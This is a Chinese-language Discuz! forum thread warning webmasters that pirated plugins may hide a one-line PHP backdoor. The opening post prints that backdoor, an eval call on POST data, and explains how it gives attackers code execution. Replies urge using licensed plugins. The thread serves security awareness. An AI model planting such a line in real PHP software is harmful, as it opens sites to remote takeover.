返回列表 发帖
查看: 3060|回复: 6

某盗版插件中惊现一句话木马,小到让你根本无法发现

14

主题

12

回帖

76

积分

渐入佳境

贡献
0 点
金币
48 个
发表于 2019-7-17 09:28:38 | 显示全部楼层 |阅读模式


传送门:安全小知识:为什么使用盗版插件容易被挂马!

  1. @eval($_POST['a']);
复制代码
如上面所示,就这么短短的几个字符,隐藏在盗版插件正常代码之中,如果不细心的话,根本无法发现。
不懂php的人,可能会怀疑,这么短的一个代码,就是木马?
eval就是把普通的字符串当做php代码来执行,像上面这个代码就是执行接收到的POST数据,利用这段代码,黑客就可以向你的服务器执行代码了。
抓紧时间卸载盗版插件吧,盗版插件的安全问题已经不能忽视了!


传送门:安全小知识:为什么使用盗版插件容易被挂马!
回复

使用道具 举报

0

主题

14

回帖

37

积分

初学乍练

贡献
0 点
金币
22 个
发表于 2019-7-17 10:34:43 | 显示全部楼层
本帖最后由 TardisTeam 于 2019-7-19 11:31 编辑

前排支持,拒绝盗版
如果你只要用了一次盗版插件,一句后门代码,就可以让整个网站作废

有些攻击者不是只劫持首页到非法网站上那么简单,有的时候还会用“间谍式”写入更多潜在后门入口文件,而且命名法会伪装成正常文件名称,代码可能还是加密,以免被检测,这样就可以留着以后再进行攻击,即使你这时候把盗版插件删除,也是无济于事,还是一样会被攻击,除非你把所有新植入的后门文件也都删除了,否则针对一般站长而言,想要安全,就不得不重装网站了

如果等发生以上情况再付费找人清理后门文件和维护,不但服务费成本高,也可能没法根除到底,对于如果用心经营网站的站长,千万不要选择盗版插件,也不要随意授权网站关键信息资源给第三方,如服务器,FTP等,做好及时性备份,拒绝使用盗版插件或模版
回复 支持 反对

使用道具 举报

73

主题

273

回帖

405

积分

炉火纯青

贡献
1 点
金币
45 个
发表于 2019-7-17 10:39:58 | 显示全部楼层
不能用 盗版  

万一有个木马  全站就废了

还是正版用着放心既可以  以后更新  还有售后服务!

回复 支持 反对

使用道具 举报

0

主题

18

回帖

119

积分

渐入佳境

贡献
0 点
金币
96 个
发表于 2019-7-17 16:10:39 来自手机 | 显示全部楼层
坚决不用盗版
回复 支持 反对

使用道具 举报

114

主题

252

回帖

414

积分

炉火纯青

贡献
0 点
金币
42 个
发表于 2019-7-17 17:12:34 | 显示全部楼层
苹果 发表于 2019-7-17 10:39
不能用 盗版  

万一有个木马  全站就废了

说的对,支持 正版
咸宁www.0715123.com咸宁网 咸宁二手车www.0715c.com
回复 支持 反对

使用道具 举报

37

主题

70

回帖

114

积分

渐入佳境

贡献
0 点
金币
2 个
发表于 2023-3-29 14:01:11 | 显示全部楼层
哦哦明白了
回复 支持 反对

使用道具 举报

头像被屏蔽

0

主题

110

回帖

115

积分

禁止发言

贡献
0 点
金币
5 个
发表于 2023-3-29 23:32:09 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

  • 关注公众号
  • 有偿服务微信
  • 有偿服务QQ

手机版|小黑屋|Discuz! 官方交流社区 ( 皖ICP备16010102号 |皖公网安备34010302002376号 )|网站地图|star

GMT+8, 2024-5-19 06:34 , Processed in 0.037719 second(s), 5 queries , Redis On.

Powered by Discuz! W1.0 Licensed

Cpoyright © 2001-2024 Discuz! Team.

关灯 在本版发帖
有偿服务QQ
有偿服务微信
返回顶部
快速回复 返回顶部 返回列表